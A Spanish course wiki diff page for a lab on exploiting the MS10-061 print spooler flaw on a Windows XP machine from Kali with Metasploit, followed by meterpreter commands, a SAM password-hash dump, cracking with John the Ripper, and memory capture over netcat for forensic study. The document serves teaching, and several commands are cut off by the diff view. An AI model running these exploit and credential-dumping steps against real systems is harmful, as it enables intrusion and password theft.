sad:t2:m4
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
sad:t2:m4 [2018/12/03 18:03] – José Manuel Guallar | sad:t2:m4 [2019/01/10 14:40] (actual) – José Manuel Guallar | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
====== Metasploit 4 ====== | ====== Metasploit 4 ====== | ||
- | Escenario | + | **Escenario** |
¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ||
- | ¿Qué es Helix? | + | ** ¿Qué es Helix?** |
Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | ||
Línea 15: | Línea 15: | ||
El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | ||
- | Referencias | + | **Referencias** |
* http:// | * http:// | ||
* https:// | * https:// | ||
- | Requisitos para hacer esta practica | + | **Requisitos para hacer esta practica** |
* Maquina XP | * Maquina XP | ||
* Kali | * Kali | ||
- | Post requisitos | + | ** Post requisitos** |
* Volatility | * Volatility | ||
- | Que haremos en esta practica | + | **Que haremos en esta practica** |
* Descargar Helix2008R1 | * Descargar Helix2008R1 | ||
Línea 71: | Línea 71: | ||
Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | ||
- | NetBIOS es un acrónimo de sistema de entrada/ | + | **NetBIOS** es un acrónimo de sistema de entrada/ |
Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | ||
Línea 95: | Línea 95: | ||
{{: | {{: | ||
- | + | ** | |
- | Acceso a los recursos SMB | + | Acceso a los recursos SMB** |
< | < | ||
Línea 120: | Línea 120: | ||
msfconsole | msfconsole | ||
search ms10_061 | search ms10_061 | ||
- | use exploit/ | + | use exploit/ |
info | info | ||
set PAYLOAD windows/ | set PAYLOAD windows/ | ||
Línea 155: | Línea 155: | ||
{{: | {{: | ||
+ | |||
+ | < | ||
+ | getuid | ||
+ | getpid | ||
+ | shell | ||
+ | tasklist /v /fi "PID eq " | ||
+ | Cambia el PID por el que te ha salido con la sentencia getpid | ||
+ | netstat -nao | findstr " | ||
+ | </ | ||
+ | |||
+ | **getuid** mostrará el usuario que el servidor de meterpreter ejecuta en el xp. Por consiguiente, | ||
+ | |||
+ | **getpid** proporciona el identificador de proceso (PID) de la sesión de meterpreter que se ejecuta en la máquina de la víctima. Mi PID es (1876). | ||
+ | |||
+ | **Shell** proporciona acceso de línea de comandos a la máquina Windows. | ||
+ | |||
+ | tasklist, este comando mostrará una lista de aplicaciones y tareas/ | ||
+ | |||
+ | (/v) muestra | ||
+ | |||
+ | (/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | ||
+ | |||
+ | **netstat** muestra conexiones de red. | ||
+ | |||
+ | (-n) muestra direcciones y números de puerto en forma numérica | ||
+ | |||
+ | (-a) Muestra todas las conexiones y puertos de escucha | ||
+ | |||
+ | (-o) muestra el identificador de proceso propietario asociado a cada conexión. | ||
+ | |||
+ | {{: | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | ===== Archivos Forenses Basicos ===== | ||
+ | |||
+ | < | ||
+ | tasklist > forense_tasklist.txt | ||
+ | netstat -nao > forense_netstat.txt | ||
+ | dir > forense_dir.txt | ||
+ | exit | ||
+ | </ | ||
+ | |||
+ | Comando 1, redirige la salida creada por TaskList en un archivo llamado forense_tasklist. txt. | ||
+ | Comando 2, redirige la salida creada por netstat en un archivo llamado forense_netstat. txt. | ||
+ | Comando 3, redirige la salida creada por dir en un archivo llamado forense_dir. txt. | ||
+ | Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | ||
+ | |||
+ | |||
+ | {{: | ||
+ | ** | ||
+ | Obtener la base de datos SAM** | ||
+ | |||
+ | [[https:// | ||
+ | |||
+ | El administrador de cuentas de seguridad Security Account Manager (SAM) es un archivo de base de datos en Windows XP, Windows Vista y Windows 7 que almacena las contraseñas de los usuarios | ||
+ | |||
+ | < | ||
+ | hashdump | ||
+ | # seleccionamos todo, boton derecho del raton y copiar | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | < | ||
+ | gnome-text-editor samhash.txt | ||
+ | # pegamos y guardamos el fichero | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | **Preparacion para la recogida de datos de la memoria** | ||
+ | |||
+ | < | ||
+ | mkdir -p / | ||
+ | cd / | ||
+ | nc -l -vvv -p 8888 > ms10_061.dd | ||
+ | </ | ||
+ | |||
+ | Se crea un directorio | ||
+ | |||
+ | Se cambia el directorio en/forense /ms10_061. | ||
+ | |||
+ | Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | ||
+ | |||
+ | {{: | ||
+ | |||
+ | |||
+ | ===== Memoria del XP ===== | ||
+ | |||
+ | |||
+ | Click en CD/DVD(IDE) | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | Aceptamos pinchamos en la camara | ||
+ | |||
+ | * en origen ponemos Physical Memory | ||
+ | * Localizacion NetCat | ||
+ | * Ip Destino la del Kali | ||
+ | * puerto 8888 | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | ||
+ | |||
+ | ===== Recuperar archivos del xp. ===== | ||
+ | |||
+ | En el Kali | ||
+ | |||
+ | vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | Descarga de los ficheros forenses en el meterpreter | ||
+ | |||
+ | |||
+ | < | ||
+ | pwd | ||
+ | download C: | ||
+ | download C: | ||
+ | download C: | ||
+ | download C: | ||
+ | </ | ||
+ | |||
+ | |||
+ | RvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador | ||
+ | |||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | En otra ventana de terminal ejecutaremos un John The Ripper | ||
+ | |||
+ | < | ||
+ | cp / | ||
+ | grep -i admin samhash.txt > adminhash.txt | ||
+ | # cat /dev/null > / | ||
+ | john --format=nt adminhash.txt | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | print de pantalla final que hay que entregar | ||
+ | |||
+ | |||
+ | < | ||
+ | ls -lrta | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplazalo por tu PID | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplaza (RvOYs3UqrJqo7a.exe) por tu programa malicioso | ||
+ | date | ||
+ | echo "Tu nombre" | ||
+ | </ | ||
sad/t2/m4.1543860234.txt.gz · Última modificación: (editor externo)